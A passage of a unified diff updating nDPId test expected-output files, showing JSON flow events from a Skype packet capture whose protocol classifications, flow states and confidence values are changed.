+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634591,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634589,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634591,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634589,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694738,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694738,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1138,7 +1141,7 @@ 00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1147,38 +1150,38 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706168,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706168,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636300,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 